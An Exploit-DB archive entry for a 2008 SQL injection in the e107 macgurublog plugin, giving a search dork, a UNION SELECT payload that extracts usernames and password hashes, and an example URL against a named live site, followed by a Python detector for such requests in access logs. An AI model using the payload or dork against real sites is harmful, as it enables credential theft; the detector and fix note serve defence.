- 18 Dec 2022
- EDB-ID
- 6856
- EDB Verified
- Passed
- Author
- ZORLU
- Vulnerability type
- WEBAPPS
- Platform
- PHP
- CVE
- cve-2008-6438
- Publication date
- 2008-10-28
Code:
e107 Plugin macgurublog_menu macgurublog.php (uid) Remote Sql inj
author: ZoRLu
home: z0rlu.blogspot.com
concat: [email protected]
date: 28/10/2008
n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
n0te: a.q kpss : ) )
dork: allinurl:"macgurublog.php?uid="
exploit:
http://localhost/script_path/macgurublog.php?uid=[SQL]
[SQL]=
-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
example:
http://www.dmchat.org.uk/e107_plugins/macgurublog_menu/macgurublog.php?uid=-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
thanks: str0ke
# milw0rm.com [2008-10-28]
- Source
- www.exploit-db.com
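
A detection sketch for the request pattern in the advisory above, added here as an example and not part of the original post or of e107: it scans web-server access logs for requests to macgurublog.php whose decoded uid value is not a plain integer. The combined log format, the sample log lines (constructed, with documentation IP addresses) and the assumption that a legitimate uid is always a non-negative integer are not taken from the page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCRIPT = "macgurublog.php"  # script named in the advisory
PARAM = "uid"               # parameter named in the advisory

def suspicious_uid(log_line):
    """Return the decoded uid value if it is not a plain integer, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/" + SCRIPT):
        return None
    # parse_qs undoes '+' and %XX encoding, so encoded payloads are compared decoded.
    for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        # Assumption: a legitimate uid is a non-negative integer; anything else is flagged.
        if not re.fullmatch(r"\d+", value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_uid) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_uid(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log: a normal request, the request shape from the advisory,
# and a request to an unrelated script that must be ignored.
SAMPLE_LOG = [
    '198.51.100.7 - - [28/Oct/2008:10:01:12 +0000] "GET /e107_plugins/'
    'macgurublog_menu/macgurublog.php?uid=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [28/Oct/2008:10:02:40 +0000] "GET /e107_plugins/'
    'macgurublog_menu/macgurublog.php?uid=-1+union+select+concat(user_name,'
    'char(58),user_password,char(58)),2+from+e107_user/* HTTP/1.1" 200 4811',
    '198.51.100.7 - - [28/Oct/2008:10:03:05 +0000] "GET /news.php?uid=abc '
    'HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric uid -> {value!r}")
```

The same integer-only rule, applied in the plugin before uid reaches the query (a cast to integer or a bound parameter), is the corresponding fix on the application side.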